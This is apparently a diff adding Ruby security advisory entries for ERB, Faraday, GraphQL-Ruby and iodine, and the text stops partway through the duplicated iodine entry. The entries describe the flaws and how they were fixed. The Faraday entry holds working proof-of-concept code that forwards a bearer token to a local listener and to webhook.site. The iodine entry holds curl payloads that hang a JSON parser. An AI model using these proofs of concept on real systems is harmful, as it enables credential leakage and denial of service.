+  The `@_init` guard was the recognized last line of defense against ERB being used as a deserialization gadget. Prior gadget chain research -- including Luke Jahnke's November 2024 Ruby 3.4 chain (nastystereo.com) and vakzz's 2021 Universal Deserialization Gadget -- pursued entirely different approaches (Gem::SpecFetcher, UncaughtThrowError, TarReader+WriteAdapter) without exploring the ERB def_method/def_module path. The `def_module` bypass is simpler and more direct than all previous chains, and was not addressed by the subsequent patches to Ruby 3.4 or RubyGems 3.6.
+
+  This bypass renders the @_init mitigation ineffective across all ERB versions from 2.2.0 through 6.0.3 (latest as of April 2026). Combined with the DeprecatedInstanceVariableProxy gadget (present in all ActiveSupport versions through 7.2.3), this constitutes a universal RCE gadget chain for Ruby 3.2+ applications using Rails.
+
+  <details>
+
+  ### Gadget chain history
+
+  Six generations of Ruby Marshal gadget chains have been discovered (2018-2026). Each bypassed the previous round of mitigations:
+
+  | Year | Chain | Mitigated in |
+  |------|-------|-------------|
+  | 2018 | Gem::Requirement (Luke Jahnke) | RubyGems 3.0 |
+  | 2021 | UDG -- TarReader+WriteAdapter (vakzz) | RubyGems 3.1 |
+  | 2022 | Gem::Specification._load (vakzz) | RubyGems 3.6 |
+  | 2024 | UncaughtThrowError (Luke Jahnke) | Ruby 3.4 patches |
+  | 2024 | Gem::Source::Git#rev_parse | RubyGems 3.6 |
+  | **2026** | **ERB#def_module @_init bypass** | **ERB 6.0.4** |
+
+  </details>
+
+  ## Patches
+
+  The problem has been patched at the following ERB versions. Please upgrade your erb.gem to any one of them.
+
+  * ERB 4.0.3.1, 4.0.4.1, 6.0.1.1, and 6.0.4
+
+  <details>
+
+  Add the `@_init` check to `def_method`. Since `def_module` and `def_class` both delegate to `def_method`, this single change covers all three bypass paths:
+
+  ```ruby
+  def def_method(mod, methodname, fname='(ERB)')
+    unless @_init.equal?(self.class.singleton_class)
+      raise ArgumentError, "not initialized"
+    end
+    src = self.src.sub(/^(?!#|$)/) {"def #{methodname}\n"} << "\nend\n"
+    mod.module_eval do
+      eval(src, binding, fname, -1)
+    end
+  end
+  ```
+
+  </details>
+
+  -----
+severity: HIGH
+cvss:
+  score: 8.1
+  vectorString: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+references:
+- url: https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv
+- url: https://nvd.nist.gov/vuln/detail/CVE-2026-41316
+- url: https://github.com/advisories/GHSA-q339-8rmv-2mhv
+publishedAt: '2026-04-24T15:36:05Z'
+withdrawnAt:
+vulnerabilities:
+- package:
+    name: erb
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: ">= 6.0.2, < 6.0.4"
+  firstPatchedVersion:
+    identifier: 6.0.4
+- package:
+    name: erb
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: ">= 5.0.0, < 6.0.1.1"
+  firstPatchedVersion:
+    identifier: 6.0.1.1
+- package:
+    name: erb
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: "= 4.0.4"
+  firstPatchedVersion:
+    identifier: 4.0.4.1
+- package:
+    name: erb
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: "< 4.0.3.1"
+  firstPatchedVersion:
+    identifier: 4.0.3.1

--- a/gems/faraday/CVE-2026-33637.yml
+++ b/gems/faraday/CVE-2026-33637.yml
@@ -1,0 +1,268 @@
+---
+gem: faraday
+cve: 2026-33637
+ghsa: 5rv5-xj5j-3484
+url: https://github.com/lostisland/faraday/security/advisories/GHSA-5rv5-xj5j-3484
+title: 'Faraday has a possible incomplete fix for GHSA-33mh-2634-fwr2: protocol-relative
+  URI objects still bypass host scoping'
+date: 2026-05-18
+description: |-
+  ## Summary
+
+  `Faraday::Connection#build_exclusive_url` still allows protocol-relative host override when the request target is provided as a `URI` object instead of a `String`. This bypasses the February 2026 fix for `GHSA-33mh-2634-fwr2` and can redirect a request built from a fixed-base `Faraday::Connection` to an attacker-controlled host while preserving connection-scoped headers such as `Authorization`.
+
+  ## Affected Component
+
+  - **Repository File(s)/Endpoint(s)**:
+    - `lib/faraday/connection.rb`
+    - `lib/faraday/request.rb`
+    - `spec/faraday/connection_spec.rb`
+    - `spec/faraday/request_spec.rb`
+  - **Function(s)**:
+    - `Faraday::Connection#build_exclusive_url`
+    - `Faraday::Connection#run_request`
+    - `Faraday::Request#url`
+    - `Faraday::Request#to_env`
+  - **Version(s) Tested**:
+    - `Faraday 2.14.1`
+    - repository HEAD `a01039c948d3e9e41e03d152aed7244f0fb4d5ca`
+
+  ## Attacker Profile
+
+  - **Who**: A remote user who can influence a per-request target/path in an application that uses a fixed-base Faraday connection
+  - **Access Required**: Ability to supply data that the application converts to `URI.parse(...)` and passes to `conn.get(...)`, `[conn.post](http://conn.post/)(...)`, or `req.url(...)`
+  - **Capability**: Control over a protocol-relative URI such as `URI("//evil.example/pwn")`
+
+  ## Steps to Reproduce
+
+  1. Use the current repository checkout and load Faraday from `lib/`.
+  2. Build a fixed-base connection and provide a protocol-relative `URI` object to `req.url`.
+  3. Observe that the request is actually sent to the attacker-controlled host instead of the configured base host.
+  4. Observe that the connection-scoped `Authorization` header remains attached to the off-host request.
+
+  ### Verification Evidence
+
+  - **Environment**: macOS, Ruby from local environment, Faraday `2.14.1`, `faraday-net_http`, local WEBrick listener on `127.0.0.1:4567`, HEAD `a01039c948d3e9e41e03d152aed7244f0fb4d5ca`
+  - **Commands executed**:
+
+  ```bash
+  $ ruby -e 'require "webrick"; server = WEBrick::HTTPServer.new(Port: 4567, BindAddress: "127.0.0.1", AccessLog: [], Logger: WEBrick::Log.new($stderr, WEBrick::Log::WARN)); server.mount_proc("/") { |req, res| res.status = 200; res.body = "host=#{req.host}\nauth=#{req["Authorization"]}\npath=#{req.path}\n" }; trap("INT") { server.shutdown }; server.start'
+  $ ruby -Ilib -e 'require "faraday"; require "faraday/net_http"; conn = Faraday.new(url: "http://trusted.example/base", headers: {"Authorization" => "Bearer secret-token"}) { |f| f.adapter :net_http }; target = ["//127.0.0.1:4567", "/pwn"].join; resp = conn.get(URI(target)); puts resp.status; puts resp.body'
+  ```
+  - **PoC code** (inline):
+
+  ```ruby
+  require "faraday"
+  require "faraday/net_http"
+
+  conn = Faraday.new(url: "http://trusted.example/base", headers: {
+    "Authorization" => "Bearer secret-token"
+  }) { |f| f.adapter :net_http }
+
+  target = ["//127.0.0.1:4567", "/pwn"].join
+  resp = conn.get(URI(target))
+
+  puts resp.status
+  puts resp.body
+  ```
+  - **Exit code**: `0`
+  - **stdout** (relevant excerpt):
+
+  ```text
+  200
+  host=127.0.0.1
+  auth=Bearer secret-token
+  path=/pwn
+  ```
+  - **stderr** (relevant excerpt):
+
+  ```text
+  N/A
+  ```
+  - **Artifacts**: none
+
+  ### Additional External Confirmation
+
+  The issue was also independently reproduced against a public HTTP collector on Faraday `2.14.1` using the default `net_http` adapter:
+
+  ```ruby
+  require "faraday"
+  require "faraday/net_http"
+
+  conn = Faraday.new(
+    url: "http://trusted.example/base",
+    headers: { "Authorization" => "Bearer secret-token" }
+  ) { |f| f.adapter :net_http }
+
+  target = ["//webhook.site", "/<collector-id>"].join
+  resp = conn.get(URI(target))
+  resp.status
+  # => 200
+  resp.url.host
+  # => "webhook.site"
+  ```
+
+  This external confirmation shows the request is not only misbuilt in memory, but is actually dispatched off-host by a real adapter under normal usage.
+
+  ## Supporting Materials
+
+  - Existing advisory for the original string-based issue: `GHSA-33mh-2634-fwr2`
+  - Existing CVE for the original string-based issue: `CVE-2026-25765`
+  - Existing regression tests for the string-only fix:
+    - `spec/faraday/connection_spec.rb:314-345`
+  - Existing test proving supported `URI` request input:
+    - `spec/faraday/request_spec.rb:26-31`
+
+  ## Impact
+
+  The direct consequence is off-host request forgery from code paths that believe they are constrained to a fixed base URL. If the
+  connection carries default headers or query parameters, those values are forwarded to the attacker-selected host.
+cvss_v3: 0.0
+cvss_v4: "<FILL IN IF AVAILABLE>"
+unaffected_versions:
+- "< 2.0.0"
+patched_versions:
+- ">= 2.14.2"
+related:
+  url:
+  - https://github.com/lostisland/faraday/security/advisories/GHSA-5rv5-xj5j-3484
+  - https://github.com/advisories/GHSA-33mh-2634-fwr2
+  - https://github.com/advisories/GHSA-5rv5-xj5j-3484
+# GitHub advisory data below - **Remove this data before committing**
+# Use this data to write patched_versions (and potentially unaffected_versions) above
+---
+identifiers:
+- type: GHSA
+  value: GHSA-5rv5-xj5j-3484
+- type: CVE
+  value: CVE-2026-33637
+summary: 'Faraday has a possible incomplete fix for GHSA-33mh-2634-fwr2: protocol-relative
+  URI objects still bypass host scoping'
+description: |-
+  ## Summary
+
+  `Faraday::Connection#build_exclusive_url` still allows protocol-relative host override when the request target is provided as a `URI` object instead of a `String`. This bypasses the February 2026 fix for `GHSA-33mh-2634-fwr2` and can redirect a request built from a fixed-base `Faraday::Connection` to an attacker-controlled host while preserving connection-scoped headers such as `Authorization`.
+
+  ## Affected Component
+
+  - **Repository File(s)/Endpoint(s)**:
+    - `lib/faraday/connection.rb`
+    - `lib/faraday/request.rb`
+    - `spec/faraday/connection_spec.rb`
+    - `spec/faraday/request_spec.rb`
+  - **Function(s)**:
+    - `Faraday::Connection#build_exclusive_url`
+    - `Faraday::Connection#run_request`
+    - `Faraday::Request#url`
+    - `Faraday::Request#to_env`
+  - **Version(s) Tested**:
+    - `Faraday 2.14.1`
+    - repository HEAD `a01039c948d3e9e41e03d152aed7244f0fb4d5ca`
+
+  ## Attacker Profile
+
+  - **Who**: A remote user who can influence a per-request target/path in an application that uses a fixed-base Faraday connection
+  - **Access Required**: Ability to supply data that the application converts to `URI.parse(...)` and passes to `conn.get(...)`, `[conn.post](http://conn.post/)(...)`, or `req.url(...)`
+  - **Capability**: Control over a protocol-relative URI such as `URI("//evil.example/pwn")`
+
+  ## Steps to Reproduce
+
+  1. Use the current repository checkout and load Faraday from `lib/`.
+  2. Build a fixed-base connection and provide a protocol-relative `URI` object to `req.url`.
+  3. Observe that the request is actually sent to the attacker-controlled host instead of the configured base host.
+  4. Observe that the connection-scoped `Authorization` header remains attached to the off-host request.
+
+  ### Verification Evidence
+
+  - **Environment**: macOS, Ruby from local environment, Faraday `2.14.1`, `faraday-net_http`, local WEBrick listener on `127.0.0.1:4567`, HEAD `a01039c948d3e9e41e03d152aed7244f0fb4d5ca`
+  - **Commands executed**:
+
+  ```bash
+  $ ruby -e 'require "webrick"; server = WEBrick::HTTPServer.new(Port: 4567, BindAddress: "127.0.0.1", AccessLog: [], Logger: WEBrick::Log.new($stderr, WEBrick::Log::WARN)); server.mount_proc("/") { |req, res| res.status = 200; res.body = "host=#{req.host}\nauth=#{req["Authorization"]}\npath=#{req.path}\n" }; trap("INT") { server.shutdown }; server.start'
+  $ ruby -Ilib -e 'require "faraday"; require "faraday/net_http"; conn = Faraday.new(url: "http://trusted.example/base", headers: {"Authorization" => "Bearer secret-token"}) { |f| f.adapter :net_http }; target = ["//127.0.0.1:4567", "/pwn"].join; resp = conn.get(URI(target)); puts resp.status; puts resp.body'
+  ```
+  - **PoC code** (inline):
+
+  ```ruby
+  require "faraday"
+  require "faraday/net_http"
+
+  conn = Faraday.new(url: "http://trusted.example/base", headers: {
+    "Authorization" => "Bearer secret-token"
+  }) { |f| f.adapter :net_http }
+
+  target = ["//127.0.0.1:4567", "/pwn"].join
+  resp = conn.get(URI(target))
+
+  puts resp.status
+  puts resp.body
+  ```
+  - **Exit code**: `0`
+  - **stdout** (relevant excerpt):
+
+  ```text
+  200
+  host=127.0.0.1
+  auth=Bearer secret-token
+  path=/pwn
+  ```
+  - **stderr** (relevant excerpt):
+
+  ```text
+  N/A
+  ```
+  - **Artifacts**: none
+
+  ### Additional External Confirmation
+
+  The issue was also independently reproduced against a public HTTP collector on Faraday `2.14.1` using the default `net_http` adapter:
+
+  ```ruby
+  require "faraday"
+  require "faraday/net_http"
+
+  conn = Faraday.new(
+    url: "http://trusted.example/base",
+    headers: { "Authorization" => "Bearer secret-token" }
+  ) { |f| f.adapter :net_http }
+
+  target = ["//webhook.site", "/<collector-id>"].join
+  resp = conn.get(URI(target))
+  resp.status
+  # => 200
+  resp.url.host
+  # => "webhook.site"
+  ```
+
+  This external confirmation shows the request is not only misbuilt in memory, but is actually dispatched off-host by a real adapter under normal usage.
+
+  ## Supporting Materials
+
+  - Existing advisory for the original string-based issue: `GHSA-33mh-2634-fwr2`
+  - Existing CVE for the original string-based issue: `CVE-2026-25765`
+  - Existing regression tests for the string-only fix:
+    - `spec/faraday/connection_spec.rb:314-345`
+  - Existing test proving supported `URI` request input:
+    - `spec/faraday/request_spec.rb:26-31`
+
+  ## Impact
+
+  The direct consequence is off-host request forgery from code paths that believe they are constrained to a fixed base URL. If the
+  connection carries default headers or query parameters, those values are forwarded to the attacker-selected host.
+severity: LOW
+cvss:
+  score: 0.0
+  vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+references:
+- url: https://github.com/lostisland/faraday/security/advisories/GHSA-5rv5-xj5j-3484
+- url: https://github.com/advisories/GHSA-33mh-2634-fwr2
+- url: https://github.com/advisories/GHSA-5rv5-xj5j-3484
+publishedAt: '2026-05-18T14:51:51Z'
+withdrawnAt:
+vulnerabilities:
+- package:
+    name: faraday
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: ">= 2.0.0, <= 2.14.1"
+  firstPatchedVersion:
+    identifier: 2.14.2

--- a/gems/graphql/GHSA-3h96-34p3-xm76.yml
+++ b/gems/graphql/GHSA-3h96-34p3-xm76.yml
@@ -1,0 +1,74 @@
+---
+gem: graphql
+ghsa: 3h96-34p3-xm76
+url: https://github.com/rmosolgo/graphql-ruby/security/advisories/GHSA-3h96-34p3-xm76
+title: GraphQL-Ruby's Ruby lexer does not count comment tokens for the purposes of
+  max_query_string_tokens
+date: 2026-05-05
+description: "GraphQL-Ruby's `max_query_string_tokens` configuration didn't count
+  comment tokens against the limit, allowing strings to be processed even after the
+  configured maximum had actually been reached. \n\nIn patched versions, the Ruby
+  lexer does count these tokens. \n\nGraphQL-CParser is not affected by this problem.
+  \n\n`max_query_string_tokens` was introduced in v2.3.1. Each 2.x version has received
+  a new patch release for including a fix."
+cvss_v3: 5.3
+cvss_v4: "<FILL IN IF AVAILABLE>"
+unaffected_versions:
+- "< 2.3.1"
+patched_versions:
+- "~> 2.3.23"
+- "~> 2.4.18"
+- "~> 2.5.26"
+- ">= 2.6.1"
+related:
+  url:
+  - https://github.com/rmosolgo/graphql-ruby/security/advisories/GHSA-3h96-34p3-xm76
+  - https://github.com/advisories/GHSA-3h96-34p3-xm76
+# GitHub advisory data below - **Remove this data before committing**
+# Use this data to write patched_versions (and potentially unaffected_versions) above
+---
+identifiers:
+- type: GHSA
+  value: GHSA-3h96-34p3-xm76
+summary: GraphQL-Ruby's Ruby lexer does not count comment tokens for the purposes
+  of max_query_string_tokens
+description: "GraphQL-Ruby's `max_query_string_tokens` configuration didn't count
+  comment tokens against the limit, allowing strings to be processed even after the
+  configured maximum had actually been reached. \n\nIn patched versions, the Ruby
+  lexer does count these tokens. \n\nGraphQL-CParser is not affected by this problem.
+  \n\n`max_query_string_tokens` was introduced in v2.3.1. Each 2.x version has received
+  a new patch release for including a fix."
+severity: MODERATE
+cvss:
+  score: 5.3
+  vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
+references:
+- url: https://github.com/rmosolgo/graphql-ruby/security/advisories/GHSA-3h96-34p3-xm76
+- url: https://github.com/advisories/GHSA-3h96-34p3-xm76
+publishedAt: '2026-05-05T21:51:15Z'
+withdrawnAt:
+vulnerabilities:
+- package:
+    name: graphql
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: ">= 2.3.1, < 2.3.23"
+  firstPatchedVersion:
+    identifier: 2.3.23
+- package:
+    name: graphql
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: ">= 2.4.0, < 2.4.18"
+  firstPatchedVersion:
+    identifier: 2.4.18
+- package:
+    name: graphql
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: ">= 2.5.0, < 2.5.26"
+  firstPatchedVersion:
+    identifier: 2.5.26
+- package:
+    name: graphql
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: "= 2.6.0"
+  firstPatchedVersion:
+    identifier: 2.6.1

--- a/gems/iodine/CVE-2026-41146.yml
+++ b/gems/iodine/CVE-2026-41146.yml
@@ -1,0 +1,448 @@
+---
+gem: iodine
+cve: 2026-41146
+ghsa: 2x79-gwq3-vxxm
+url: https://github.com/boazsegev/facil.io/security/advisories/GHSA-2x79-gwq3-vxxm
+title: Uncontrolled resource consumption and loop with unreachable exit condition
+  in facil.io and downstream iodine ruby gem
+date: 2026-04-14
+description: |-
+  ### Summary
+  `fio_json_parse` can enter an infinite loop when it encounters a nested JSON value starting with `i` or `I`. The process spins in user space and pegs one CPU core at ~100% instead of returning a parse error. Because `iodine` vendors the same parser code, the issue also affects `iodine` when it parses attacker-controlled JSON.
+
+  The smallest reproducer found is `[i`. The quoted-value form that originally exposed the issue, `[""i`, reaches the same bug because the parser tolerates missing commas and then treats the trailing `i` as the start of another value.
+
+  ### Details
+  The vulnerable logic is in `lib/facil/fiobj/fio_json_parser.h` around the numeral handling block (`0.7.5` / `0.7.6`: lines `434-468`; `master`: lines `434-468` in the current tree as tested).
+
+  This parser is reached from real library entry points, not just the header in isolation:
+
+  - `facil.io`: `lib/facil/fiobj/fiobj_json.c:377-387` (`fiobj_json2obj`) and `402-411` (`fiobj_hash_update_json`)
+  - `iodine`: `ext/iodine/iodine_json.c:161-177` (`iodine_json_convert`)
+  - `iodine`: `ext/iodine/fiobj_json.c:377-387` and `402-411`
+
+  Relevant flow:
+
+  1. Inside an array or object, the parser sees `i` or `I` and jumps to the `numeral:` label.
+  2. It calls `fio_atol((char **)&tmp)`.
+  3. For a bare `i` / `I`, `fio_atol` consumes zero characters and leaves `tmp == pos`.
+  4. The current code only falls back to float parsing when `JSON_NUMERAL[*tmp]` is true.
+  5. `JSON_NUMERAL['i'] == 0`, so the parser incorrectly accepts the value as an integer and sets `pos = tmp` without advancing.
+  6. Because parsing is still nested (`parser->depth > 0`), the outer loop continues forever with the same `pos`.
+
+  The same logic exists in `iodine`'s vendored copy at `ext/iodine/fio_json_parser.h` lines `434-468`.
+
+  Why the `[""i` form hangs:
+
+  1. The parser accepts the empty string `""` as the first array element.
+  2. It does not require a comma before the next token.
+  3. The trailing `i` is then parsed as a new nested value.
+  4. The zero-progress numeral path above causes the infinite loop.
+
+  Examples that trigger the bug:
+
+  - Array form, minimal: `[i`
+  - Object form: `{"a":i`
+  - After a quoted value in an array: `[""i`
+  - After a quoted value in an object: `{"a":""i`
+
+  ## PoC
+  Environment used for verification:
+
+  - `facil.io` commit: `162df84001d66789efa883eebb0567426d00148e`
+  - `iodine` commit: `5bebba698d69023cf47829afe51052f8caa6c7f8`
+  - standalone compile against `fio_json_parser.h`
+
+  ### Minimal standalone program
+
+  Use the normal HTTP stack. The following server calls `http_parse_body(h)`, which reaches `fiobj_json2obj` and then `fio_json_parse` for `Content-Type: application/json`.
+
+  ```c
+  #define _POSIX_C_SOURCE 200809L
+
+  #include <stdio.h>
+  #include <time.h>
+  #include <fio.h>
+  #include <http.h>
+
+  static void on_request(http_s *h) {
+    fprintf(stderr, "calling http_parse_body\n");
+    fflush(stderr);
+    http_parse_body(h);
+    fprintf(stderr, "returned from http_parse_body\n");
+    http_send_body(h, "ok\n", 3);
+  }
+
+  int main(void) {
+    if (http_listen("3000", "127.0.0.1",
+                    .on_request = on_request,
+                    .max_body_size = (1024 * 1024),
+                    .log = 1) == -1) {
+      perror("http_listen");
+      return 1;
+    }
+    fio_start(.threads = 1, .workers = 1);
+    return 0;
+  }
+  ```
+
+  `http_parse_body(h)` is the higher-level entry point and, for `Content-Type: application/json`, it reaches `fiobj_json2obj` in `lib/facil/http/http.c:1947-1953`.
+
+  Save it as `src/main.c` in a vulnerable `facil.io` checkout and build it with the repo `makefile`:
+
+  ```bash
+  git checkout 0.7.6
+  mkdir -p src
+  make NAME=http_json_poc
+  ```
+
+  Run:
+
+  ```bash
+  ./tmp/http_json_poc
+  ```
+
+  Then in another terminal send one of these payloads:
+
+  ```bash
+  printf '[i' | curl --http1.1 -H 'Content-Type: application/json' -X POST --data-binary @- http://127.0.0.1:3000/
+  printf '{"a":i' | curl --http1.1 -H 'Content-Type: application/json' -X POST --data-binary @- http://127.0.0.1:3000/
+  printf '[""i' | curl --http1.1 -H 'Content-Type: application/json' -X POST --data-binary @- http://127.0.0.1:3000/
+  printf '{"a":""i' | curl --http1.1 -H 'Content-Type: application/json' -X POST --data-binary @- http://127.0.0.1:3000/
+  ```
+
+  Observed result on a vulnerable build:
+
+  - The server prints `calling http_parse_body` and never reaches `returned from http_parse_body`.
+  - The request never completes.
+  - One worker thread spins until the process is killed.
+
+  ### Downstream impact in `iodine`
+
+  `iodine` vendors the same parser implementation in `ext/iodine/fio_json_parser.h`, so any `iodine` code path that parses attacker-controlled JSON through this parser inherits the same hang / CPU exhaustion behavior.
+
+  Single-file `iodine` HTTP server repro:
+
+  ```ruby
+  require "iodine"
+
+  APP = proc do |env|
+    body = env["rack.input"].read.to_s
+    warn "calling Iodine::JSON.parse on: #{body.inspect}"
+    Iodine::JSON.parse(body)
+    warn "returned from Iodine::JSON.parse"
+    [200, { "Content-Type" => "text/plain", "Content-Length" => "3" }, ["ok\n"]]
+  end
+
+  Iodine.listen service: :http,
+                address: "127.0.0.1",
+                port: "3000",
+                handler: APP
+
+  Iodine.threads = 1
+  Iodine.workers = 1
+  Iodine.start
+  ```
+
+  Run:
+
+  ```bash
+  ruby iodine_json_parse_http_poc.rb
+  ```
+
+  Then in a second terminal:
+
+  ```bash
+  printf '[i' | curl --http1.1 -X POST --data-binary @- http://127.0.0.1:3000/
+  printf '{"a":i' | curl --http1.1 -X POST --data-binary @- http://127.0.0.1:3000/
+  printf '[""i' | curl --http1.1 -X POST --data-binary @- http://127.0.0.1:3000/
+  printf '{"a":""i' | curl --http1.1 -X POST --data-binary @- http://127.0.0.1:3000/
+  ```
+
+  On a vulnerable build, the server prints the `calling Iodine::JSON.parse...` line but never prints the `returned from Iodine::JSON.parse` line for these payloads.
+
+  ## Impact
+  This is a denial-of-service issue. An attacker who can supply JSON to an affected parser path can cause the process to spin indefinitely and consume CPU at roughly 100% of one core. In practice, the impact depends on whether an application exposes parser access to untrusted clients, but for services that do, a single crafted request can tie up a worker or thread until it is killed or restarted.
+
+  I would describe the impact as:
+
+  - Availability impact: high for affected parser entry points
+  - Confidentiality impact: none observed
+  - Integrity impact: none observed
+
+  ## Suggested Patch
+  Treat zero-consumption numeric parses as failures before accepting the token.
+
+  ```diff
+  diff --git a/lib/facil/fiobj/fio_json_parser.h b/lib/facil/fiobj/fio_json_parser.h
+  @@
+         uint8_t *tmp = pos;
+         long long i = fio_atol((char **)&tmp);
+         if (tmp > limit)
+           goto stop;
+  -      if (!tmp || JSON_NUMERAL[*tmp]) {
+  +      if (!tmp || tmp == pos || JSON_NUMERAL[*tmp]) {
+           tmp = pos;
+           double f = fio_atof((char **)&tmp);
+           if (tmp > limit)
+             goto stop;
+  -        if (!tmp || JSON_NUMERAL[*tmp])
+  +        if (!tmp || tmp == pos || JSON_NUMERAL[*tmp])
+             goto error;
+           fio_json_on_float(parser, f);
+           pos = tmp;
+  ```
+
+  This preserves permissive `inf` / `nan` handling when the float parser actually consumes input, but rejects bare `i` / `I` tokens that otherwise leave the cursor unchanged.
+
+  The same change should be mirrored to `iodine`'s vendored copy:
+
+  - `ext/iodine/fio_json_parser.h`
+
+
+  ## Impact
+  - `facil.io`
+    - Verified on `master` commit `162df84001d66789efa883eebb0567426d00148e` (`git describe`: `0.7.5-24-g162df840`)
+    - Verified on tagged releases `0.7.5` and `0.7.6`
+  - `iodine` Ruby gem
+    - Verified on repo commit `5bebba698d69023cf47829afe51052f8caa6c7f8`
+    - Verified on tag / gem version `v0.7.58`
+    - The gem vendors a copy of the vulnerable parser in `ext/iodine/fio_json_parser.h`
+cvss_v3: "<FILL IN IF AVAILABLE>"
+cvss_v4: "<FILL IN IF AVAILABLE>"
+notes: Never patched
+related:
+  url:
+  - https://github.com/boazsegev/facil.io/security/advisories/GHSA-2x79-gwq3-vxxm
+  - https://nvd.nist.gov/vuln/detail/CVE-2026-41146
+  - https://github.com/boazsegev/facil.io/commit/5128747363055201d3ecf0e29bf0a961703c9fa0
+  - https://github.com/advisories/GHSA-2x79-gwq3-vxxm
+# GitHub advisory data below - **Remove this data before committing**
+# Use this data to write patched_versions (and potentially unaffected_versions) above
+---
+identifiers:
+- type: GHSA
+  value: GHSA-2x79-gwq3-vxxm
+- type: CVE
+  value: CVE-2026-41146
+summary: Uncontrolled resource consumption and loop with unreachable exit condition
+  in facil.io and downstream iodine ruby gem
+description: |-
+  ### Summary
+  `fio_json_parse` can enter an infinite loop when it encounters a nested JSON value starting with `i` or `I`. The process spins in user space and pegs one CPU core at ~100% instead of returning a parse error. Because `iodine` vendors the same parser code, the issue also affects `iodine` when it parses attacker-controlled JSON.
+
+  The smallest reproducer found is `[i`. The quoted-value form that originally exposed the issue, `[""i`, reaches the same bug because the parser tolerates missing commas and then treats the trailing `i` as the start of another value.
+
+  ### Details
+  The vulnerable logic is in `lib/facil/fiobj/fio_json_parser.h` around the numeral handling block (`0.7.5` / `0.7.6`: lines `434-468`; `master`: lines `434-468` in the current tree as tested).
+
+  This parser is reached from real library entry points, not just the header in isolation:
+
+  - `facil.io`: `lib/facil/fiobj/fiobj_json.c:377-387` (`fiobj_json2obj`) and `402-411` (`fiobj_hash_update_json`)
+  - `iodine`: `ext/iodine/iodine_json.c:161-177` (`iodine_json_convert`)
+  - `iodine`: `ext/iodine/fiobj_json.c:377-387` and `402-411`
+
+  Relevant flow:
+
+  1. Inside an array or object, the parser sees `i` or `I` and jumps to the `numeral:` label.
+  2. It calls `fio_atol((char **)&tmp)`.
+  3. For a bare `i` / `I`, `fio_atol` consumes zero characters and leaves `tmp == pos`.
+  4. The current code only falls back to float parsing when `JSON_NUMERAL[*tmp]` is true.
+  5. `JSON_NUMERAL['i'] == 0`, so the parser incorrectly accepts the value as an integer and sets `pos = tmp` without advancing.
+  6. Because parsing is still nested (`parser->depth > 0`), the outer loop continues forever with the same `pos`.
+
+  The same logic exists in `iodine`'s vendored copy at `ext/iodine/fio_json_parser.h` lines `434-468`.
+
+  Why the `[""i` form hangs:
+
+  1. The parser accepts the empty string `""` as the first array element.
+  2. It does not require a comma before the next token.
+  3. The trailing `i` is then parsed as a new nested value.
+  4. The zero-progress numeral path above causes the infinite loop.
+
+  Examples that trigger the bug:
+
+  - Array form, minimal: `[i`
+  - Object form: `{"a":i`
+  - After a quoted value in an array: `[""i`
+  - After a quoted value in an object: `{"a":""i`
+
+  ## PoC
+  Environment used for verification:
+
+  - `facil.io` commit: `162df84001d66789efa883eebb0567426d00148e`
+  - `iodine` commit: `5bebba698d69023cf47829afe51052f8caa6c7f8`
+  - standalone compile against `fio_json_parser.h`
+
+  ### Minimal standalone program
+
+  Use the normal HTTP stack. The following server calls `http_parse_body(h)`, which reaches `fiobj_json2obj` and then `fio_json_parse` for `Content-Type: application/json`.
+
+  ```c
+  #define _POSIX_C_SOURCE 200809L
+
+  #include <stdio.h>
+  #include <time.h>
+  #include <fio.h>
+  #include <http.h>
+
+  static void on_request(http_s *h) {
+    fprintf(stderr, "calling http_parse_body\n");
+    fflush(stderr);
+    http_parse_body(h);
+    fprintf(stderr, "returned from http_parse_body\n");
+    http_send_body(h, "ok\n", 3);
+  }
+
+  int main(void) {
+    if (http_listen("3000", "127.0.0.1",
+                    .on_request = on_request,
+                    .max_body_size = (1024 * 1024),
+                    .log = 1) == -1) {
+      perror("http_listen");
+      return 1;
+    }
+    fio_start(.threads = 1, .workers = 1);
+    return 0;
+  }
+  ```
+
+  `http_parse_body(h)` is the higher-level entry point and, for `Content-Type: application/json`, it reaches `fiobj_json2obj` in `lib/facil/http/http.c:1947-1953`.
+
+  Save it as `src/main.c` in a vulnerable `facil.io` checkout and build it with the repo `makefile`:
+
+  ```bash
+  git checkout 0.7.6
+  mkdir -p src
+  make NAME=http_json_poc
+  ```
+
+  Run:
+
+  ```bash
+  ./tmp/http_json_poc
+  ```
+
+  Then in another terminal send one of these payloads:
+
+  ```bash
+  printf '[i' | curl --http1.1 -H 'Content-Type: application/json' -X POST --data-binary @- http://127.0.0.1:3000/
+  printf '{"a":i' | curl --http1.1 -H 'Content-Type: application/json' -X POST --data-binary @- http://127.0.0.1:3000/
+  printf '[""i' | curl --http1.1 -H 'Content-Type: application/json' -X POST --data-binary @- http://127.0.0.1:3000/
+  printf '{"a":""i' | curl --http1.1 -H 'Content-Type: application/json' -X POST --data-binary @- http://127.0.0.1:3000/
+  ```
+
+  Observed result on a vulnerable build:
+
+  - The server prints `calling http_parse_body` and never reaches `returned from http_parse_body`.
+  - The request never completes.
+  - One worker thread spins until the process is killed.
+
+  ### Downstream impact in `iodine`
+
+  `iodine` vendors the same parser implementation in `ext/iodine/fio_json_parser.h`, so any `iodine` code path that parses attacker-controlled JSON through this parser inherits the same hang / CPU exhaustion behavior.
+
+  Single-file `iodine` HTTP server repro:
+
+  ```ruby
+  require "iodine"
+
+  APP = proc do |env|
+    body = env["rack.input"].read.to_s
+    warn "calling Iodine::JSON.parse on: #{body.inspect}"
+    Iodine::JSON.parse(body)
+    warn "returned from Iodine::JSON.parse"
+    [200, { "Content-Type" => "text/plain", "Content-Length" => "3" }, ["ok\n"]]
+  end
+
+  Iodine.listen service: :http,
+                address: "127.0.0.1",
+                port: "3000",
+                handler: APP
+
+  Iodine.threads = 1
+  Iodine.workers = 1
